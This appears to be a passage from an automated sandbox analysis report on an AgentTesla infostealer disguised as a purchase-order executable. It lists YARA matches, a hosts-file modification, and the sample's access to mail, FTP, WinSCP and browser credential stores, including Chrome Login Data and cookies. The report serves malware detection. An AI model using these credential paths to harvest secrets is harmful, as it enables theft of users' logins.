                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: unknown VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 6588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 7124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7076, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7100, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 5908, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara matchFile source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 7124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 5908, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
